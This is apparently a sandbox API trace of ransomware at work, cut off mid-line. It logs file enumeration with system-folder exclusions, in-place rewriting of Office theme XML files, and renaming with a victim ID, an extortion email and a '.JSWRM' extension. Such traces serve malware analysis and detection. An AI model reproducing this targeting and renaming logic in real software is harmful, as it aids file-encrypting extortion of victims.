lstrcmpiW (lpString1="Red.xml", lpString2="windows") returned -1 [0100.614] lstrcmpiW (lpString1="Red.xml", lpString2="recovery") returned 1 [0100.614] lstrcmpiW (lpString1="Red.xml", lpString2="perflogs") returned 1 [0100.614] lstrcmpiW (lpString1="Red.xml", lpString2="documents and settings") returned 1 [0100.614] lstrcmpiW (lpString1="Red.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.614] lstrcmpiW (lpString1="Red.xml", lpString2="system volume information") returned -1 [0100.614] lstrcmpiW (lpString1="Red.xml", lpString2="msocache") returned 1 [0100.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Red.xml", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0100.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Red.xml", cchWideChar=7, lpMultiByteStr=0x345ebd8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Red.xml", lpUsedDefaultChar=0x0) returned 7 [0100.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Red.xml", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0100.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Red.xml", cchWideChar=7, lpMultiByteStr=0x345eba8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Red.xml", lpUsedDefaultChar=0x0) returned 7 [0100.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0100.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0100.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0100.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Red.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\red.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.615] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=737) returned 1 [0100.615] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.615] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0100.617] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.617] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.617] CloseHandle (hObject=0x314) returned 1 [0100.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0100.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0100.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0100.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0100.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0100.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0100.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.617] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Red.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\red.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Red.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\red.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0100.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0100.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0100.618] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11377f40, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11377f40, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11377f40, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e8, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Slipstream.xml", cAlternateFileName="SLIPST~1.XML")) returned 1 [0100.618] lstrcmpiW (lpString1="Slipstream.xml", lpString2=".") returned 1 [0100.618] lstrcmpiW (lpString1="Slipstream.xml", lpString2="..") returned 1 [0100.618] lstrcmpiW (lpString1="Slipstream.xml", lpString2="...") returned 1 [0100.618] lstrcmpiW (lpString1="Slipstream.xml", lpString2="windows") returned -1 [0100.618] lstrcmpiW (lpString1="Slipstream.xml", lpString2="recovery") returned 1 [0100.618] lstrcmpiW (lpString1="Slipstream.xml", lpString2="perflogs") returned 1 [0100.618] lstrcmpiW (lpString1="Slipstream.xml", lpString2="documents and settings") returned 1 [0100.618] lstrcmpiW (lpString1="Slipstream.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.618] lstrcmpiW (lpString1="Slipstream.xml", lpString2="system volume information") returned -1 [0100.618] lstrcmpiW (lpString1="Slipstream.xml", lpString2="msocache") returned 1 [0100.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0100.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Slipstream.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Slipstream.xml", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Slipstream.xml", lpUsedDefaultChar=0x0) returned 14 [0100.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0100.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0100.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Slipstream.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Slipstream.xml", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Slipstream.xml", lpUsedDefaultChar=0x0) returned 14 [0100.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0100.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0100.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0100.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0100.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Slipstream.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\slipstream.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.619] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=744) returned 1 [0100.619] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.620] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0100.625] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.625] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.625] CloseHandle (hObject=0x314) returned 1 [0100.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0100.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0100.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0100.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0100.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0100.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0100.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.625] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Slipstream.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\slipstream.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Slipstream.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\slipstream.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0100.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0100.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0100.626] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11482f7f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11482f7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e7, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Violet II.xml", cAlternateFileName="VIOLET~1.XML")) returned 1 [0100.626] lstrcmpiW (lpString1="Violet II.xml", lpString2=".") returned 1 [0100.626] lstrcmpiW (lpString1="Violet II.xml", lpString2="..") returned 1 [0100.626] lstrcmpiW (lpString1="Violet II.xml", lpString2="...") returned 1 [0100.626] lstrcmpiW (lpString1="Violet II.xml", lpString2="windows") returned -1 [0100.626] lstrcmpiW (lpString1="Violet II.xml", lpString2="recovery") returned 1 [0100.626] lstrcmpiW (lpString1="Violet II.xml", lpString2="perflogs") returned 1 [0100.626] lstrcmpiW (lpString1="Violet II.xml", lpString2="documents and settings") returned 1 [0100.626] lstrcmpiW (lpString1="Violet II.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.626] lstrcmpiW (lpString1="Violet II.xml", lpString2="system volume information") returned 1 [0100.627] lstrcmpiW (lpString1="Violet II.xml", lpString2="msocache") returned 1 [0100.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0100.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Violet II.xml", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Violet II.xml", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Violet II.xml", lpUsedDefaultChar=0x0) returned 13 [0100.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0100.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0100.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Violet II.xml", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Violet II.xml", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Violet II.xml", lpUsedDefaultChar=0x0) returned 13 [0100.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0100.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0100.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0100.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0100.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Violet II.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\violet ii.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.628] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=743) returned 1 [0100.628] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.628] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0100.630] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.630] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.630] CloseHandle (hObject=0x314) returned 1 [0100.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0100.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0100.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0100.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0100.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0100.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0100.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.631] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Violet II.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\violet ii.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Violet II.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\violet ii.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0100.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0100.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0100.631] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114108ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114108ca, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114108ca, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e4, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Violet.xml", cAlternateFileName="")) returned 1 [0100.631] lstrcmpiW (lpString1="Violet.xml", lpString2=".") returned 1 [0100.631] lstrcmpiW (lpString1="Violet.xml", lpString2="..") returned 1 [0100.631] lstrcmpiW (lpString1="Violet.xml", lpString2="...") returned 1 [0100.631] lstrcmpiW (lpString1="Violet.xml", lpString2="windows") returned -1 [0100.632] lstrcmpiW (lpString1="Violet.xml", lpString2="recovery") returned 1 [0100.632] lstrcmpiW (lpString1="Violet.xml", lpString2="perflogs") returned 1 [0100.632] lstrcmpiW (lpString1="Violet.xml", lpString2="documents and settings") returned 1 [0100.632] lstrcmpiW (lpString1="Violet.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.632] lstrcmpiW (lpString1="Violet.xml", lpString2="system volume information") returned 1 [0100.632] lstrcmpiW (lpString1="Violet.xml", lpString2="msocache") returned 1 [0100.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0100.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Violet.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Violet.xml", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Violet.xml", lpUsedDefaultChar=0x0) returned 10 [0100.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0100.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0100.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Violet.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Violet.xml", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Violet.xml", lpUsedDefaultChar=0x0) returned 10 [0100.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0100.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0100.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0100.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 